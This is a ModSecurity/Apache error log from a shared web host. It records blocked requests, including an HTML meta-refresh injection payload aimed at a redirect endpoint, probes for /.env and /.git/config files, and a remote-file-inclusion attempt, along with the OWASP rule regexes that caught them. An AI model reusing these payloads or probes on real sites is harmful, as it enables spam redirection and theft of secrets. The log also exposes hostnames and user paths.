"agHxIUWKUxpmnkK7zHyNggAAAQw"]
[Mon May 11 17:09:21.418242 2026] [security2:error] [pid 1411055:tid 1411069] [client 194.233.64.127:58865] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 /> found within ARGS:url: http://Elegbederafiukenny@P.Laus.I.Bleljh@H.Att.Ie.M.C.D.O.W.E.Ll2.56.6.3Burton.Rene@G.Oog.L.Eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>Is.gd</a><meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIUWKUxpmnkK7zHyNggAAAQw"]
[Mon May 11 17:09:21.418533 2026] [security2:error] [pid 1411055:tid 1411069] [client 194.233.64.127:58865] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Elegbederafiukenny@P.Laus.I.Bleljh@H.Att.Ie.M.C.D.O.W.E.Ll2.56.6.3Burton.Rene@G.Oog.L.Eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>Is.gd</a><meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIUWKUxpmnkK7zHyNggAAAQw"]
[Mon May 11 17:09:21.419882 2026] [security2:error] [pid 1411055:tid 1411069] [client 194.233.64.127:58865] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Elegbederafiukenny@P.Laus.I.Bleljh@H.Att.Ie.M.C.D.O.W.E.Ll2.56.6.3Burton.Rene@G.Oog.L.Eemail.2.1@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/halls_of_residence_33686>Is.gd</a><meta http-equiv=refresh content=0;url=https://is.gd/halls_of_residence_33686 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSen [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIUWKUxpmnkK7zHyNggAAAQw"]
[Mon May 11 17:09:21.420313 2026] [security2:error] [pid 1411055:tid 1411069] [client 194.233.64.127:58865] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIUWKUxpmnkK7zHyNggAAAQw"]
[Mon May 11 17:09:21.421258 2026] [security2:error] [pid 1411055:tid 1411069] [client 194.233.64.127:58865] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxIUWKUxpmnkK7zHyNggAAAQw"]
[Mon May 11 17:09:30.485654 2026] [ssl:error] [pid 1412074:tid 1412100] (EAI 2)Name or service not known: [client 17.246.19.54:38892] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:09:30.489167 2026] [ssl:error] [pid 1412074:tid 1412100] AH01941: stapling_renew_response: responder error
[Mon May 11 17:09:45.729722 2026] [security2:error] [pid 1416109:tid 1416140] [client 185.213.247.40:50043] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxOVV4kyjgo4bQBUhlRwAAAMo"], referer: https://www.piregwan-genesis.com/
[Mon May 11 17:09:54.183924 2026] [autoindex:error] [pid 1424905:tid 1424908] [client 44.222.23.145:20578] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 17:09:54.606354 2026] [autoindex:error] [pid 1412074:tid 1412091] [client 44.222.23.145:21022] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 17:09:55.117835 2026] [autoindex:error] [pid 1411201:tid 1411255] [client 188.208.222.103:29140] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 17:09:55.841741 2026] [autoindex:error] [pid 1411099:tid 1411121] [client 85.209.79.247:32242] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 17:09:57.993826 2026] [autoindex:error] [pid 1416109:tid 1416146] [client 73.92.145.97:50837] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 17:09:58.971405 2026] [autoindex:error] [pid 1412074:tid 1412100] [client 95.214.229.181:40007] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 17:10:02.708846 2026] [security2:error] [pid 1424905:tid 1424931] [client 43.156.249.28:36360] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/"] [unique_id "agHxSoW8yzYoWG_eyCWnLgAAAVc"], referer: http://krakoukas.com
[Mon May 11 17:10:17.522301 2026] [security2:error] [pid 1411055:tid 1411059] [client 129.226.174.80:43748] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHxWUWKUxpmnkK7zHyNwQAAAQI"]
[Mon May 11 17:10:31.305856 2026] [authz_core:error] [pid 1424905:tid 1424930] [client 216.73.216.110:35117] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/cron/lang/error_log
[Mon May 11 17:10:36.086640 2026] [authz_core:error] [pid 1411099:tid 1411105] [client 216.73.216.110:8819] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/Laravel/error_log
[Mon May 11 17:10:44.735643 2026] [ssl:error] [pid 1411099:tid 1411117] (EAI 2)Name or service not known: [client 54.174.58.224:54136] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:10:44.735707 2026] [ssl:error] [pid 1411099:tid 1411117] AH01941: stapling_renew_response: responder error
[Mon May 11 17:10:45.022559 2026] [ssl:error] [pid 1424905:tid 1424915] (EAI 2)Name or service not known: [client 54.174.58.233:37725] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:10:45.022608 2026] [ssl:error] [pid 1424905:tid 1424915] AH01941: stapling_renew_response: responder error
[Mon May 11 17:10:45.406117 2026] [ssl:error] [pid 1412074:tid 1412076] (EAI 2)Name or service not known: [client 54.174.58.224:50495] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:10:45.406175 2026] [ssl:error] [pid 1412074:tid 1412076] AH01941: stapling_renew_response: responder error
[Mon May 11 17:10:45.787450 2026] [ssl:error] [pid 1411099:tid 1411120] (EAI 2)Name or service not known: [client 54.174.58.254:51876] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:10:45.787484 2026] [ssl:error] [pid 1411099:tid 1411120] AH01941: stapling_renew_response: responder error
[Mon May 11 17:10:45.984669 2026] [ssl:error] [pid 1411201:tid 1411261] (EAI 2)Name or service not known: [client 54.174.58.242:30913] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:10:45.984713 2026] [ssl:error] [pid 1411201:tid 1411261] AH01941: stapling_renew_response: responder error
[Mon May 11 17:10:46.175796 2026] [ssl:error] [pid 1424905:tid 1424932] (EAI 2)Name or service not known: [client 54.174.58.252:13613] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:10:46.175825 2026] [ssl:error] [pid 1424905:tid 1424932] AH01941: stapling_renew_response: responder error
[Mon May 11 17:10:46.552247 2026] [ssl:error] [pid 1412074:tid 1412084] (EAI 2)Name or service not known: [client 54.174.58.246:4882] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:10:46.552280 2026] [ssl:error] [pid 1412074:tid 1412084] AH01941: stapling_renew_response: responder error
[Mon May 11 17:10:46.930979 2026] [ssl:error] [pid 1424905:tid 1424917] (EAI 2)Name or service not known: [client 54.174.58.242:17787] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:10:46.931008 2026] [ssl:error] [pid 1424905:tid 1424917] AH01941: stapling_renew_response: responder error
[Mon May 11 17:11:12.948230 2026] [:error] [pid 1411055:tid 1411075] [client 216.244.66.232:53956] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:11:22.039091 2026] [autoindex:error] [pid 1411055:tid 1411059] [client 172.236.127.133:34274] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 17:11:24.635843 2026] [:error] [pid 1424905:tid 1424919] [client 216.244.66.232:41288] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:11:27.511792 2026] [authz_core:error] [pid 1424905:tid 1424922] [client 47.128.58.6:26716] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/ID3/error_log
[Mon May 11 17:12:18.216295 2026] [:error] [pid 1411201:tid 1411258] [client 20.127.244.253:34392] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:12:33.935707 2026] [ssl:error] [pid 1416109:tid 1416153] (EAI 2)Name or service not known: [client 143.110.199.146:49390] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:12:33.935753 2026] [ssl:error] [pid 1416109:tid 1416153] AH01941: stapling_renew_response: responder error
[Mon May 11 17:12:36.892433 2026] [ssl:error] [pid 1411055:tid 1411070] (EAI 2)Name or service not known: [client 185.182.22.103:39353] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:12:36.892466 2026] [ssl:error] [pid 1411055:tid 1411070] AH01941: stapling_renew_response: responder error
[Mon May 11 17:12:38.410740 2026] [ssl:error] [pid 1424905:tid 1424927] (EAI 2)Name or service not known: [client 158.46.131.115:45537] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:12:38.410782 2026] [ssl:error] [pid 1424905:tid 1424927] AH01941: stapling_renew_response: responder error
[Mon May 11 17:12:45.775415 2026] [ssl:error] [pid 1424905:tid 1424919] (EAI 2)Name or service not known: [client 24.199.107.132:48242] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:12:45.775447 2026] [ssl:error] [pid 1424905:tid 1424919] AH01941: stapling_renew_response: responder error
[Mon May 11 17:12:49.831945 2026] [ssl:error] [pid 1416109:tid 1416148] (EAI 2)Name or service not known: [client 160.224.132.70:34421] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:12:49.831980 2026] [ssl:error] [pid 1416109:tid 1416148] AH01941: stapling_renew_response: responder error
[Mon May 11 17:12:56.083023 2026] [ssl:error] [pid 1424905:tid 1424912] (EAI 2)Name or service not known: [client 64.23.162.234:59396] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:12:56.083060 2026] [ssl:error] [pid 1424905:tid 1424912] AH01941: stapling_renew_response: responder error
[Mon May 11 17:12:59.143933 2026] [ssl:error] [pid 1416109:tid 1416133] (EAI 2)Name or service not known: [client 45.149.23.102:34817] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:12:59.143977 2026] [ssl:error] [pid 1416109:tid 1416133] AH01941: stapling_renew_response: responder error
[Mon May 11 17:13:01.822054 2026] [ssl:error] [pid 1412074:tid 1412083] (EAI 2)Name or service not known: [client 95.134.10.220:45225] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:13:01.822094 2026] [ssl:error] [pid 1412074:tid 1412083] AH01941: stapling_renew_response: responder error
[Mon May 11 17:13:08.813580 2026] [ssl:error] [pid 1412074:tid 1412096] (EAI 2)Name or service not known: [client 165.232.54.179:44244] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:13:08.813629 2026] [ssl:error] [pid 1412074:tid 1412096] AH01941: stapling_renew_response: responder error
[Mon May 11 17:13:10.991975 2026] [ssl:error] [pid 1424905:tid 1424916] (EAI 2)Name or service not known: [client 207.230.121.219:39857] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:13:10.992006 2026] [ssl:error] [pid 1424905:tid 1424916] AH01941: stapling_renew_response: responder error
[Mon May 11 17:13:12.232458 2026] [ssl:error] [pid 1411055:tid 1411066] (EAI 2)Name or service not known: [client 176.100.133.159:34239] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:13:12.232490 2026] [ssl:error] [pid 1411055:tid 1411066] AH01941: stapling_renew_response: responder error
[Mon May 11 17:13:14.768359 2026] [ssl:error] [pid 1411055:tid 1411080] (EAI 2)Name or service not known: [client 157.48.108.254:38681] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:13:14.768402 2026] [ssl:error] [pid 1411055:tid 1411080] AH01941: stapling_renew_response: responder error
[Mon May 11 17:13:19.545824 2026] [ssl:error] [pid 1412074:tid 1412090] (EAI 2)Name or service not known: [client 3.255.141.153:39356] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:13:19.545861 2026] [ssl:error] [pid 1412074:tid 1412090] AH01941: stapling_renew_response: responder error
[Mon May 11 17:14:00.274311 2026] [security2:error] [pid 1424905:tid 1424931] [client 18.195.155.157:56359] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.com"] [uri "/.env"] [unique_id "agHyOIW8yzYoWG_eyCWopgAAAVc"]
[Mon May 11 17:14:00.274472 2026] [security2:error] [pid 1424905:tid 1424931] [client 18.195.155.157:56359] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.com"] [uri "/.env"] [unique_id "agHyOIW8yzYoWG_eyCWopgAAAVc"]
[Mon May 11 17:14:00.274877 2026] [core:error] [pid 1424905:tid 1424931] [client 18.195.155.157:56359] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:14:00.275009 2026] [security2:error] [pid 1424905:tid 1424931] [client 18.195.155.157:56359] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecorporatefinance.com"] [uri "/.env"] [unique_id "agHyOIW8yzYoWG_eyCWopgAAAVc"]
[Mon May 11 17:14:52.653149 2026] [ssl:error] [pid 1411201:tid 1411254] [client 13.219.121.241:44702] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname mail.rentparadise.fr provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 17:14:54.265369 2026] [security2:error] [pid 1424905:tid 1424930] [client 8.231.165.185:46998] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agHyboW8yzYoWG_eyCWpBAAAAVY"]
[Mon May 11 17:14:54.265532 2026] [security2:error] [pid 1424905:tid 1424930] [client 8.231.165.185:46998] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agHyboW8yzYoWG_eyCWpBAAAAVY"]
[Mon May 11 17:14:55.226060 2026] [security2:error] [pid 1424905:tid 1424930] [client 8.231.165.185:46998] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHyboW8yzYoWG_eyCWpBAAAAVY"]
[Mon May 11 17:14:55.343567 2026] [security2:error] [pid 1411201:tid 1411269] [client 8.231.165.185:47028] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agHyb_y_GXSWIKeli0sDTAAAAJg"]
[Mon May 11 17:14:55.343680 2026] [security2:error] [pid 1411201:tid 1411269] [client 8.231.165.185:47028] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agHyb_y_GXSWIKeli0sDTAAAAJg"]
[Mon May 11 17:14:56.059823 2026] [security2:error] [pid 1411201:tid 1411269] [client 8.231.165.185:47028] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agHyb_y_GXSWIKeli0sDTAAAAJg"]
[Mon May 11 17:15:24.263636 2026] [ssl:error] [pid 1411055:tid 1411063] (EAI 2)Name or service not known: [client 34.244.20.186:54468] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 17:15:24.264122 2026] [ssl:error] [pid 1411055:tid 1411063] AH01941: stapling_renew_response: responder error
[Mon May 11 17:15:28.733090 2026] [ssl:error] [pid 1411201:tid 1411247] (EAI 2)Name or service not known: [client 34.244.44.123:49400] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:15:28.733165 2026] [ssl:error] [pid 1411201:tid 1411247] AH01941: stapling_renew_response: responder error
[Mon May 11 17:17:35.532725 2026] [security2:error] [pid 1411055:tid 1411071] [client 85.208.96.193:30394] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://143.198.197.159 found within ARGS:url: http://143.198.197.159/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHzD0WKUxpmnkK7zHyQCgAAAQ4"]
